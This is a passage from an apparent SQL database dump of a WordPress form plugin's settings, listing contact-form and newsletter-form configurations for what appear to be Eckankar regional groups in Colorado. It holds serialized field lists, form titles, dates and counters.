submitted.'),(264,8,'calculations','a:0:{}','calculations','a:0:{}'),(265,8,'formContentData','a:12:{i:0;s:7:\"html_20\";i:1;s:10:\"textbox_21\";i:2;s:11:\"lastname_22\";i:3;s:8:\"email_23\";i:4;s:8:\"phone_24\";i:5;s:13:\"listselect_25\";i:6;s:5:\"hr_26\";i:7;s:7:\"html_27\";i:8;s:13:\"listselect_28\";i:9;s:11:\"textarea_29\";i:10;s:18:\"html_1663797745321\";i:11;s:9:\"submit_31\";}','formContentData','a:12:{i:0;s:7:\"html_20\";i:1;s:10:\"textbox_21\";i:2;s:11:\"lastname_22\";i:3;s:8:\"email_23\";i:4;s:8:\"phone_24\";i:5;s:13:\"listselect_25\";i:6;s:5:\"hr_26\";i:7;s:7:\"html_27\";i:8;s:13:\"listselect_28\";i:9;s:11:\"textarea_29\";i:10;s:18:\"html_1663797745321\";i:11;s:9:\"submit_31\";}'),(266,8,'_seq_num','19','_seq_num','19'),(267,9,'objectType','Form Setting','objectType','Form Setting'),(268,9,'editActive','','editActive',''),(269,9,'date_updated','2016-02-26 20:46:42','date_updated','2016-02-26 20:46:42'),(270,9,'clear_complete','1','clear_complete','1'),(271,9,'hide_complete','1','hide_complete','1'),(272,9,'show_title','0','show_title','0'),(273,9,'status','','status',''),(274,9,'append_page','','append_page',''),(275,9,'ajax','0','ajax','0'),(276,9,'logged_in','0','logged_in','0'),(277,9,'not_logged_in_msg','','not_logged_in_msg',''),(278,9,'sub_limit_number','','sub_limit_number',''),(279,9,'sub_limit_msg','','sub_limit_msg',''),(280,9,'last_sub','1','last_sub','1'),(281,9,'title','Chela Ideas','title','Chela Ideas'),(282,9,'conditions','a:0:{}','conditions','a:0:{}'),(283,9,'default_label_pos','above','default_label_pos','above'),(284,9,'wrapper_class','','wrapper_class',''),(285,9,'element_class','','element_class',''),(286,9,'key','','key',''),(287,9,'add_submit','1','add_submit','1'),(288,9,'currency','','currency',''),(289,9,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(290,9,'calculations','a:0:{}','calculations','a:0:{}'),(291,9,'formContentData','a:18:{i:0;s:8:\"html_238\";i:1;s:11:\"textbox_239\";i:2;s:12:\"lastname_240\";i:3;s:9:\"email_241\";i:4;s:9:\"phone_242\";i:5;s:14:\"listselect_243\";i:6;s:6:\"hr_244\";i:7;s:8:\"html_245\";i:8;s:11:\"textbox_256\";i:9;s:12:\"textarea_253\";i:10;s:11:\"textbox_257\";i:11;s:11:\"textbox_258\";i:12;s:11:\"textbox_259\";i:13;s:11:\"textbox_263\";i:14;s:11:\"textbox_264\";i:15;s:11:\"textbox_265\";i:16;s:18:\"html_1663797774442\";i:17;s:10:\"submit_255\";}','formContentData','a:18:{i:0;s:8:\"html_238\";i:1;s:11:\"textbox_239\";i:2;s:12:\"lastname_240\";i:3;s:9:\"email_241\";i:4;s:9:\"phone_242\";i:5;s:14:\"listselect_243\";i:6;s:6:\"hr_244\";i:7;s:8:\"html_245\";i:8;s:11:\"textbox_256\";i:9;s:12:\"textarea_253\";i:10;s:11:\"textbox_257\";i:11;s:11:\"textbox_258\";i:12;s:11:\"textbox_259\";i:13;s:11:\"textbox_263\";i:14;s:11:\"textbox_264\";i:15;s:11:\"textbox_265\";i:16;s:18:\"html_1663797774442\";i:17;s:10:\"submit_255\";}'),(292,9,'_seq_num','3','_seq_num','3'),(293,10,'objectType','Form Setting','objectType','Form Setting'),(294,10,'editActive','','editActive',''),(295,10,'date_updated','2017-07-04 18:06:40','date_updated','2017-07-04 18:06:40'),(296,10,'clear_complete','1','clear_complete','1'),(297,10,'hide_complete','1','hide_complete','1'),(298,10,'show_title','0','show_title','0'),(299,10,'status','','status',''),(300,10,'last_sub','15','last_sub','15'),(301,10,'append_page','','append_page',''),(302,10,'ajax','0','ajax','0'),(303,10,'logged_in','0','logged_in','0'),(304,10,'not_logged_in_msg','','not_logged_in_msg',''),(305,10,'sub_limit_number','','sub_limit_number',''),(306,10,'sub_limit_msg','','sub_limit_msg',''),(307,10,'title','Colorado RESA Organization Communications','title','Colorado RESA Organization Communications'),(308,10,'conditions','a:0:{}','conditions','a:0:{}'),(309,10,'default_label_pos','above','default_label_pos','above'),(310,10,'wrapper_class','','wrapper_class',''),(311,10,'element_class','','element_class',''),(312,10,'key','','key',''),(313,10,'add_submit','1','add_submit','1'),(314,10,'currency','','currency',''),(315,10,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(316,10,'calculations','a:0:{}','calculations','a:0:{}'),(317,10,'formContentData','a:13:{i:0;s:7:\"html_18\";i:1;s:9:\"textbox_6\";i:2;s:10:\"lastname_8\";i:3;s:8:\"email_10\";i:4;s:7:\"phone_9\";i:5;s:13:\"listselect_11\";i:6;s:5:\"hr_13\";i:7;s:7:\"html_14\";i:8;s:13:\"listselect_15\";i:9;s:11:\"textarea_16\";i:10;s:18:\"html_1663797801429\";i:11;s:9:\"submit_12\";i:12;s:18:\"html_1663797799791\";}','formContentData','a:13:{i:0;s:7:\"html_18\";i:1;s:9:\"textbox_6\";i:2;s:10:\"lastname_8\";i:3;s:8:\"email_10\";i:4;s:7:\"phone_9\";i:5;s:13:\"listselect_11\";i:6;s:5:\"hr_13\";i:7;s:7:\"html_14\";i:8;s:13:\"listselect_15\";i:9;s:11:\"textarea_16\";i:10;s:18:\"html_1663797801429\";i:11;s:9:\"submit_12\";i:12;s:18:\"html_1663797799791\";}'),(318,10,'_seq_num','27','_seq_num','27'),(319,11,'objectType','Form Setting','objectType','Form Setting'),(320,11,'editActive','1','editActive','1'),(321,11,'date_updated','2017-07-04 17:23:30','date_updated','2017-07-04 17:23:30'),(322,11,'clear_complete','1','clear_complete','1'),(323,11,'hide_complete','1','hide_complete','1'),(324,11,'show_title','0','show_title','0'),(325,11,'status','','status',''),(326,11,'append_page','','append_page',''),(327,11,'ajax','0','ajax','0'),(328,11,'logged_in','0','logged_in','0'),(329,11,'not_logged_in_msg','','not_logged_in_msg',''),(330,11,'sub_limit_number','','sub_limit_number',''),(331,11,'sub_limit_msg','','sub_limit_msg',''),(332,11,'last_sub','1','last_sub','1'),(333,11,'title','Colorado Springs Initiators and ESAâs','title','Colorado Springs Initiators and ESAâs'),(334,11,'conditions','a:0:{}','conditions','a:0:{}'),(335,11,'default_label_pos','above','default_label_pos','above'),(336,11,'wrapper_class','','wrapper_class',''),(337,11,'element_class','','element_class',''),(338,11,'key','','key',''),(339,11,'add_submit','1','add_submit','1'),(340,11,'currency','','currency',''),(341,11,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(342,11,'calculations','a:0:{}','calculations','a:0:{}'),(343,11,'formContentData','a:11:{i:0;s:8:\"html_117\";i:1;s:11:\"textbox_118\";i:2;s:12:\"lastname_119\";i:3;s:9:\"email_120\";i:4;s:9:\"phone_121\";i:5;s:14:\"listselect_122\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166439207\";i:7;s:12:\"textarea_126\";i:8;s:18:\"html_1663801551902\";i:9;s:10:\"submit_128\";i:10;s:18:\"html_1663801548990\";}','formContentData','a:11:{i:0;s:8:\"html_117\";i:1;s:11:\"textbox_118\";i:2;s:12:\"lastname_119\";i:3;s:9:\"email_120\";i:4;s:9:\"phone_121\";i:5;s:14:\"listselect_122\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166439207\";i:7;s:12:\"textarea_126\";i:8;s:18:\"html_1663801551902\";i:9;s:10:\"submit_128\";i:10;s:18:\"html_1663801548990\";}'),(344,11,'_seq_num','4','_seq_num','4'),(345,12,'objectType','Form Setting','objectType','Form Setting'),(346,12,'editActive','1','editActive','1'),(347,12,'date_updated','2017-07-04 18:14:18','date_updated','2017-07-04 18:14:18'),(348,12,'clear_complete','1','clear_complete','1'),(349,12,'hide_complete','1','hide_complete','1'),(350,12,'show_title','0','show_title','0'),(351,12,'status','','status',''),(352,12,'append_page','','append_page',''),(353,12,'ajax','0','ajax','0'),(354,12,'logged_in','0','logged_in','0'),(355,12,'not_logged_in_msg','','not_logged_in_msg',''),(356,12,'sub_limit_number','','sub_limit_number',''),(357,12,'sub_limit_msg','','sub_limit_msg',''),(358,12,'last_sub','2','last_sub','2'),(359,12,'title','Colorado Springs Leadership Communications','title','Colorado Springs Leadership Communications'),(360,12,'conditions','a:0:{}','conditions','a:0:{}'),(361,12,'default_label_pos','above','default_label_pos','above'),(362,12,'wrapper_class','','wrapper_class',''),(363,12,'element_class','','element_class',''),(364,12,'key','','key',''),(365,12,'add_submit','1','add_submit','1'),(366,12,'currency','','currency',''),(367,12,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(368,12,'calculations','a:0:{}','calculations','a:0:{}'),(369,12,'formContentData','a:13:{i:0;s:7:\"html_32\";i:1;s:10:\"textbox_33\";i:2;s:11:\"lastname_34\";i:3;s:8:\"email_35\";i:4;s:8:\"phone_36\";i:5;s:13:\"listselect_37\";i:6;s:5:\"hr_38\";i:7;s:7:\"html_39\";i:8;s:13:\"listselect_40\";i:9;s:11:\"textarea_41\";i:10;s:18:\"html_1663801397261\";i:11;s:9:\"submit_43\";i:12;s:18:\"html_1663801395614\";}','formContentData','a:13:{i:0;s:7:\"html_32\";i:1;s:10:\"textbox_33\";i:2;s:11:\"lastname_34\";i:3;s:8:\"email_35\";i:4;s:8:\"phone_36\";i:5;s:13:\"listselect_37\";i:6;s:5:\"hr_38\";i:7;s:7:\"html_39\";i:8;s:13:\"listselect_40\";i:9;s:11:\"textarea_41\";i:10;s:18:\"html_1663801397261\";i:11;s:9:\"submit_43\";i:12;s:18:\"html_1663801395614\";}'),(370,12,'_seq_num','4','_seq_num','4'),(371,13,'date_updated','2016-03-03 03:15:50','date_updated','2016-03-03 03:15:50'),(372,13,'clear_complete','1','clear_complete','1'),(373,13,'hide_complete','1','hide_complete','1'),(374,13,'show_title','0','show_title','0'),(375,13,'status','','status',''),(376,13,'append_page','','append_page',''),(377,13,'ajax','0','ajax','0'),(378,13,'logged_in','0','logged_in','0'),(379,13,'not_logged_in_msg','','not_logged_in_msg',''),(380,13,'sub_limit_number','','sub_limit_number',''),(381,13,'sub_limit_msg','','sub_limit_msg',''),(382,13,'last_sub','36','last_sub','36'),(383,13,'title','Eckankar In Colorado Contact Form','title','Eckankar In Colorado Contact Form'),(384,13,'_seq_num','150','_seq_num','150'),(385,13,'conditions','a:0:{}','conditions','a:0:{}'),(386,14,'objectType','Form Setting','objectType','Form Setting'),(387,14,'editActive','1','editActive','1'),(388,14,'title','Johnstown Area Initiators and ESAâs','title','Johnstown Area Initiators and ESAâs'),(389,14,'key','','key',''),(390,14,'created_at','2018-01-03 12:34:29','created_at','2018-01-03 12:34:29'),(391,14,'date_updated','2017-07-04 17:33:42','date_updated','2017-07-04 17:33:42'),(392,14,'clear_complete','1','clear_complete','1'),(393,14,'hide_complete','1','hide_complete','1'),(394,14,'show_title','0','show_title','0'),(395,14,'status','','status',''),(396,14,'append_page','','append_page',''),(397,14,'ajax','0','ajax','0'),(398,14,'logged_in','0','logged_in','0'),(399,14,'not_logged_in_msg','','not_logged_in_msg',''),(400,14,'sub_limit_number','','sub_limit_number',''),(401,14,'sub_limit_msg','','sub_limit_msg',''),(402,14,'conditions','a:0:{}','conditions','a:0:{}'),(403,14,'default_label_pos','above','default_label_pos','above'),(404,14,'wrapper_class','','wrapper_class',''),(405,14,'element_class','','element_class',''),(406,14,'add_submit','1','add_submit','1'),(407,14,'currency','','currency',''),(408,14,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(409,14,'calculations','a:0:{}','calculations','a:0:{}'),(410,14,'formContentData','a:10:{i:0;s:18:\"html_1515012877904\";i:1;s:23:\"firstname_1515012036721\";i:2;s:22:\"lastname_1515012040393\";i:3;s:19:\"email_1515012046399\";i:4;s:19:\"phone_1515012055554\";i:5;s:29:\"your_local_area_1515013258725\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166502762\";i:7;s:37:\"enter_your_message_here_1515013766874\";i:8;s:18:\"html_1663798119504\";i:9;s:20:\"submit_1515013824829\";}','formContentData','a:10:{i:0;s:18:\"html_1515012877904\";i:1;s:23:\"firstname_1515012036721\";i:2;s:22:\"lastname_1515012040393\";i:3;s:19:\"email_1515012046399\";i:4;s:19:\"phone_1515012055554\";i:5;s:29:\"your_local_area_1515013258725\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166502762\";i:7;s:37:\"enter_your_message_here_1515013766874\";i:8;s:18:\"html_1663798119504\";i:9;s:20:\"submit_1515013824829\";}'),(411,14,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(412,14,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(413,14,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(414,14,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(415,14,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(416,14,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(417,14,'validateRequiredField','','validateRequiredField',''),(418,14,'honeypotHoneypotError','','honeypotHoneypotError',''),(419,14,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(420,14,'drawerDisabled','','drawerDisabled',''),(421,15,'objectType','Form Setting','objectType','Form Setting'),(422,15,'editActive','1','editActive','1'),(423,15,'date_updated','2017-07-04 17:33:42','date_updated','2017-07-04 17:33:42'),(424,15,'clear_complete','1','clear_complete','1'),(425,15,'hide_complete','1','hide_complete','1'),(426,15,'show_title','0','show_title','0'),(427,15,'status','','status',''),(428,15,'append_page','','append_page',''),(429,15,'ajax','0','ajax','0'),(430,15,'logged_in','0','logged_in','0'),(431,15,'not_logged_in_msg','','not_logged_in_msg',''),(432,15,'sub_limit_number','','sub_limit_number',''),(433,15,'sub_limit_msg','','sub_limit_msg',''),(434,15,'title','Longmont Initiators and ESAâs','title','Longmont Initiators and ESAâs'),(435,15,'conditions','a:0:{}','conditions','a:0:{}'),(436,15,'default_label_pos','above','default_label_pos','above'),(437,15,'wrapper_class','','wrapper_class',''),(438,15,'element_class','','element_class',''),(439,15,'key','','key',''),(440,15,'add_submit','1','add_submit','1'),(441,15,'currency','','currency',''),(442,15,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(443,15,'calculations','a:0:{}','calculations','a:0:{}'),(444,15,'formContentData','a:10:{i:0;s:8:\"html_129\";i:1;s:11:\"textbox_130\";i:2;s:12:\"lastname_131\";i:3;s:9:\"email_132\";i:4;s:9:\"phone_133\";i:5;s:14:\"listselect_134\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166597727\";i:7;s:12:\"textarea_138\";i:8;s:18:\"html_1663798148731\";i:9;s:10:\"submit_140\";}','formContentData','a:10:{i:0;s:8:\"html_129\";i:1;s:11:\"textbox_130\";i:2;s:12:\"lastname_131\";i:3;s:9:\"email_132\";i:4;s:9:\"phone_133\";i:5;s:14:\"listselect_134\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166597727\";i:7;s:12:\"textarea_138\";i:8;s:18:\"html_1663798148731\";i:9;s:10:\"submit_140\";}'),(445,16,'objectType','Form Setting','objectType','Form Setting'),(446,16,'editActive','1','editActive','1'),(447,16,'date_updated','2017-07-04 18:19:57','date_updated','2017-07-04 18:19:57'),(448,16,'clear_complete','1','clear_complete','1'),(449,16,'hide_complete','1','hide_complete','1'),(450,16,'show_title','0','show_title','0'),(451,16,'status','','status',''),(452,16,'append_page','','append_page',''),(453,16,'ajax','0','ajax','0'),(454,16,'logged_in','0','logged_in','0'),(455,16,'not_logged_in_msg','','not_logged_in_msg',''),(456,16,'sub_limit_number','','sub_limit_number',''),(457,16,'sub_limit_msg','','sub_limit_msg',''),(458,16,'last_sub','2','last_sub','2'),(459,16,'title','Loveland Leadership Communications','title','Loveland Leadership Communications'),(460,16,'conditions','a:0:{}','conditions','a:0:{}'),(461,16,'default_label_pos','above','default_label_pos','above'),(462,16,'wrapper_class','','wrapper_class',''),(463,16,'element_class','','element_class',''),(464,16,'key','','key',''),(465,16,'add_submit','1','add_submit','1'),(466,16,'currency','','currency',''),(467,16,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(468,16,'calculations','a:0:{}','calculations','a:0:{}'),(469,16,'formContentData','a:12:{i:0;s:7:\"html_44\";i:1;s:10:\"textbox_45\";i:2;s:11:\"lastname_46\";i:3;s:8:\"email_47\";i:4;s:8:\"phone_48\";i:5;s:13:\"listselect_49\";i:6;s:5:\"hr_50\";i:7;s:7:\"html_51\";i:8;s:13:\"listselect_52\";i:9;s:11:\"textarea_53\";i:10;s:18:\"html_1663800453785\";i:11;s:9:\"submit_55\";}','formContentData','a:12:{i:0;s:7:\"html_44\";i:1;s:10:\"textbox_45\";i:2;s:11:\"lastname_46\";i:3;s:8:\"email_47\";i:4;s:8:\"phone_48\";i:5;s:13:\"listselect_49\";i:6;s:5:\"hr_50\";i:7;s:7:\"html_51\";i:8;s:13:\"listselect_52\";i:9;s:11:\"textarea_53\";i:10;s:18:\"html_1663800453785\";i:11;s:9:\"submit_55\";}'),(470,16,'_seq_num','4','_seq_num','4'),(471,17,'objectType','Form Setting','objectType','Form Setting'),(472,17,'editActive','1','editActive','1'),(473,17,'title','MEMBER NEWSLETTER SUBSCRIPTION','title','MEMBER NEWSLETTER SUBSCRIPTION'),(474,17,'show_title','0','show_title','0'),(475,17,'clear_complete','1','clear_complete','1'),(476,17,'hide_complete','1','hide_complete','1'),(477,17,'default_label_pos','above','default_label_pos','above'),(478,17,'wrapper_class','','wrapper_class',''),(479,17,'element_class','','element_class',''),(480,17,'key','','key',''),(481,17,'add_submit','0','add_submit','0'),(482,17,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(483,17,'changeDateErrorMsg','','changeDateErrorMsg',''),(484,17,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(485,17,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(486,17,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(487,17,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(488,17,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(489,17,'validateRequiredField','','validateRequiredField',''),(490,17,'honeypotHoneypotError','','honeypotHoneypotError',''),(491,17,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(492,17,'currency','','currency',''),(493,17,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(494,17,'logged_in','0','logged_in','0'),(495,17,'not_logged_in_msg','','not_logged_in_msg',''),(496,17,'sub_limit_msg','The form has reached its submission limit.','sub_limit_msg','The form has reached its submission limit.'),(497,17,'calculations','a:0:{}','calculations','a:0:{}'),(498,17,'conditions','a:0:{}','conditions','a:0:{}'),(499,17,'formContentData','a:9:{i:0;s:18:\"html_1550094026658\";i:1;s:23:\"firstname_1550094074971\";i:2;s:22:\"lastname_1550094079880\";i:3;s:19:\"email_1550094081455\";i:4;s:23:\"liststate_1550094094681\";i:5;s:25:\"listcountry_1550094096365\";i:6;s:40:\"choose_your_subscription_s_1550099095640\";i:7;s:18:\"html_1663800483443\";i:8;s:20:\"submit_1550094251707\";}','formContentData','a:9:{i:0;s:18:\"html_1550094026658\";i:1;s:23:\"firstname_1550094074971\";i:2;s:22:\"lastname_1550094079880\";i:3;s:19:\"email_1550094081455\";i:4;s:23:\"liststate_1550094094681\";i:5;s:25:\"listcountry_1550094096365\";i:6;s:40:\"choose_your_subscription_s_1550099095640\";i:7;s:18:\"html_1663800483443\";i:8;s:20:\"submit_1550094251707\";}'),(500,17,'drawerDisabled','','drawerDisabled',''),(501,18,'objectType','Form Setting','objectType','Form Setting'),(502,18,'editActive','1','editActive','1'),(503,18,'date_updated','2017-07-04 18:26:58','date_updated','2017-07-04 18:26:58'),(504,18,'clear_complete','1','clear_complete','1'),(505,18,'hide_complete','1','hide_complete','1'),(506,18,'show_title','0','show_title','0'),(507,18,'status','','status',''),(508,18,'append_page','','append_page',''),(509,18,'ajax','0','ajax','0'),(510,18,'logged_in','0','logged_in','0'),(511,18,'not_logged_in_msg','','not_logged_in_msg',''),(512,18,'sub_limit_number','','sub_limit_number',''),(513,18,'sub_limit_msg','','sub_limit_msg',''),(514,18,'last_sub','1','last_sub','1'),(515,18,'title','Northwest Colorado Leadership Communications','title','Northwest Colorado Leadership Communications'),(516,18,'conditions','a:0:{}','conditions','a:0:{}'),(517,18,'default_label_pos','above','default_label_pos','above'),(518,18,'wrapper_class','','wrapper_class',''),(519,18,'element_class','','element_class',''),(520,18,'key','','key',''),(521,18,'add_submit','1','add_submit','1'),(522,18,'currency','','currency',''),(523,18,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(524,18,'calculations','a:0:{}','calculations','a:0:{}'),(525,18,'formContentData','a:12:{i:0;s:7:\"html_68\";i:1;s:10:\"textbox_69\";i:2;s:11:\"lastname_70\";i:3;s:8:\"email_71\";i:4;s:8:\"phone_72\";i:5;s:13:\"listselect_73\";i:6;s:5:\"hr_74\";i:7;s:7:\"html_75\";i:8;s:13:\"listselect_76\";i:9;s:11:\"textarea_77\";i:10;s:18:\"html_1663800517759\";i:11;s:9:\"submit_79\";}','formContentData','a:12:{i:0;s:7:\"html_68\";i:1;s:10:\"textbox_69\";i:2;s:11:\"lastname_70\";i:3;s:8:\"email_71\";i:4;s:8:\"phone_72\";i:5;s:13:\"listselect_73\";i:6;s:5:\"hr_74\";i:7;s:7:\"html_75\";i:8;s:13:\"listselect_76\";i:9;s:11:\"textarea_77\";i:10;s:18:\"html_1663800517759\";i:11;s:9:\"submit_79\";}'),(526,18,'_seq_num','2','_seq_num','2'),(527,19,'objectType','Form Setting','objectType','Form Setting'),(528,19,'editActive','1','editActive','1'),(529,19,'date_updated','2017-07-04 17:43:25','date_updated','2017-07-04 17:43:25'),(530,19,'clear_complete','1','clear_complete','1'),(531,19,'hide_complete','1','hide_complete','1'),(532,19,'show_title','0','show_title','0'),(533,19,'status','','status',''),(534,19,'append_page','','append_page',''),(535,19,'ajax','0','ajax','0'),(536,19,'logged_in','0','logged_in','0'),(537,19,'not_logged_in_msg','','not_logged_in_msg',''),(538,19,'sub_limit_number','','sub_limit_number',''),(539,19,'sub_limit_msg','','sub_limit_msg',''),(540,19,'title','Northwest Mountain Area Initiators and ESAâs','title','Northwest Mountain Area Initiators and ESAâs'),(541,19,'conditions','a:0:{}','conditions','a:0:{}'),(542,19,'default_label_pos','above','default_label_pos','above'),(543,19,'wrapper_class','','wrapper_class',''),(544,19,'element_class','','element_class',''),(545,19,'key','','key',''),(546,19,'add_submit','1','add_submit','1'),(547,19,'currency','','currency',''),(548,19,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(549,19,'calculations','a:0:{}','calculations','a:0:{}'),(550,19,'formContentData','a:11:{i:0;s:8:\"html_153\";i:1;s:11:\"textbox_154\";i:2;s:12:\"lastname_155\";i:3;s:9:\"email_156\";i:4;s:9:\"phone_157\";i:5;s:14:\"listselect_158\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166754232\";i:7;s:12:\"textarea_162\";i:8;s:18:\"html_1663800586504\";i:9;s:10:\"submit_164\";i:10;s:18:\"html_1663800583849\";}','formContentData','a:11:{i:0;s:8:\"html_153\";i:1;s:11:\"textbox_154\";i:2;s:12:\"lastname_155\";i:3;s:9:\"email_156\";i:4;s:9:\"phone_157\";i:5;s:14:\"listselect_158\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166754232\";i:7;s:12:\"textarea_162\";i:8;s:18:\"html_1663800586504\";i:9;s:10:\"submit_164\";i:10;s:18:\"html_1663800583849\";}'),(551,20,'objectType','Form Setting','objectType','Form Setting'),(552,20,'editActive','1','editActive','1'),(553,20,'date_updated','2017-07-04 17:48:44','date_updated','2017-07-04 17:48:44'),(554,20,'clear_complete','1','clear_complete','1'),(555,20,'hide_complete','1','hide_complete','1'),(556,20,'show_title','0','show_title','0'),(557,20,'status','','status',''),(558,20,'append_page','','append_page',''),(559,20,'ajax','0','ajax','0'),(560,20,'logged_in','0','logged_in','0'),(561,20,'not_logged_in_msg','','not_logged_in_msg',''),(562,20,'sub_limit_number','','sub_limit_number',''),(563,20,'sub_limit_msg','','sub_limit_msg',''),(564,20,'title','Parker Initiators and ESAâs','title','Parker Initiators and ESAâs'),(565,20,'conditions','a:0:{}','conditions','a:0:{}'),(566,20,'default_label_pos','above','default_label_pos','above'),(567,20,'wrapper_class','','wrapper_class',''),(568,20,'element_class','','element_class',''),(569,20,'key','','key',''),(570,20,'add_submit','1','add_submit','1'),(571,20,'currency','','currency',''),(572,20,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(573,20,'calculations','a:0:{}','calculations','a:0:{}'),(574,20,'formContentData','a:10:{i:0;s:8:\"html_165\";i:1;s:11:\"textbox_166\";i:2;s:12:\"lastname_167\";i:3;s:9:\"email_168\";i:4;s:9:\"phone_169\";i:5;s:14:\"listselect_170\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166807240\";i:7;s:12:\"textarea_174\";i:8;s:18:\"html_1663800618371\";i:9;s:10:\"submit_176\";}','formContentData','a:10:{i:0;s:8:\"html_165\";i:1;s:11:\"textbox_166\";i:2;s:12:\"lastname_167\";i:3;s:9:\"email_168\";i:4;s:9:\"phone_169\";i:5;s:14:\"listselect_170\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166807240\";i:7;s:12:\"textarea_174\";i:8;s:18:\"html_1663800618371\";i:9;s:10:\"submit_176\";}'),(575,21,'objectType','Form Setting','objectType','Form Setting'),(576,21,'editActive','1','editActive','1'),(577,21,'date_updated','2016-09-20 16:31:57','date_updated','2016-09-20 16:31:57'),(578,21,'clear_complete','1','clear_complete','1'),(579,21,'hide_complete','1','hide_complete','1'),(580,21,'show_title','0','show_title','0'),(581,21,'status','','status',''),(582,21,'append_page','','append_page',''),(583,21,'ajax','0','ajax','0'),(584,21,'logged_in','0','logged_in','0'),(585,21,'not_logged_in_msg','','not_logged_in_msg',''),(586,21,'sub_limit_number','','sub_limit_number',''),(587,21,'sub_limit_msg','','sub_limit_msg',''),(588,21,'last_sub','87','last_sub','87'),(589,21,'title','Public Newsletter Subscription','title','Public Newsletter Subscription'),(590,21,'conditions','a:0:{}','conditions','a:0:{}'),(591,21,'default_label_pos','above','default_label_pos','above'),(592,21,'wrapper_class','','wrapper_class',''),(593,21,'element_class','','element_class',''),(594,21,'key','','key',''),(595,21,'add_submit','1','add_submit','1'),(596,21,'currency','','currency',''),(597,21,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(598,21,'calculations','a:0:{}','calculations','a:0:{}'),(599,21,'formContentData','a:10:{i:0;s:8:\"html_306\";i:1;s:11:\"textbox_307\";i:2;s:12:\"lastname_308\";i:3;s:9:\"email_309\";i:4;s:14:\"listselect_316\";i:5;s:15:\"listcountry_317\";i:6;s:19:\"listmultiselect_318\";i:7;s:8:\"html_313\";i:8;s:18:\"html_1663800642906\";i:9;s:10:\"submit_315\";}','formContentData','a:10:{i:0;s:8:\"html_306\";i:1;s:11:\"textbox_307\";i:2;s:12:\"lastname_308\";i:3;s:9:\"email_309\";i:4;s:14:\"listselect_316\";i:5;s:15:\"listcountry_317\";i:6;s:19:\"listmultiselect_318\";i:7;s:8:\"html_313\";i:8;s:18:\"html_1663800642906\";i:9;s:10:\"submit_315\";}'),(600,21,'drawerDisabled','','drawerDisabled',''),(601,21,'_seq_num','191','_seq_num','191'),(602,22,'objectType','Form Setting','objectType','Form Setting'),(603,22,'editActive','1','editActive','1'),(604,22,'date_updated','2017-07-04 17:53:31','date_updated','2017-07-04 17:53:31'),(605,22,'clear_complete','1','clear_complete','1'),(606,22,'hide_complete','1','hide_complete','1'),(607,22,'show_title','0','show_title','0'),(608,22,'status','','status',''),(609,22,'append_page','','append_page',''),(610,22,'ajax','0','ajax','0'),(611,22,'logged_in','0','logged_in','0'),(612,22,'not_logged_in_msg','','not_logged_in_msg',''),(613,22,'sub_limit_number','','sub_limit_number',''),(614,22,'sub_limit_msg','','sub_limit_msg',''),(615,22,'title','Pueblo Initiators and ESAâs','title','Pueblo Initiators and ESAâs'),(616,22,'conditions','a:0:{}','conditions','a:0:{}'),(617,22,'default_label_pos','above','default_label_pos','above'),(618,22,'wrapper_class','','wrapper_class',''),(619,22,'element_class','','element_class',''),(620,22,'key','','key',''),(621,22,'add_submit','1','add_submit','1'),(622,22,'currency','','currency',''),(623,22,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(624,22,'calculations','a:0:{}','calculations','a:0:{}'),(625,22,'formContentData','a:10:{i:0;s:8:\"html_177\";i:1;s:11:\"textbox_178\";i:2;s:12:\"lastname_179\";i:3;s:9:\"email_180\";i:4;s:9:\"phone_181\";i:5;s:14:\"listselect_182\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166886411\";i:7;s:12:\"textarea_186\";i:8;s:18:\"html_1663800683276\";i:9;s:10:\"submit_188\";}','formContentData','a:10:{i:0;s:8:\"html_177\";i:1;s:11:\"textbox_178\";i:2;s:12:\"lastname_179\";i:3;s:9:\"email_180\";i:4;s:9:\"phone_181\";i:5;s:14:\"listselect_182\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166886411\";i:7;s:12:\"textarea_186\";i:8;s:18:\"html_1663800683276\";i:9;s:10:\"submit_188\";}'),(626,23,'objectType','Form Setting','objectType','Form Setting'),(627,23,'editActive','1','editActive','1'),(628,23,'date_updated','2017-07-04 17:57:08','date_updated','2017-07-04 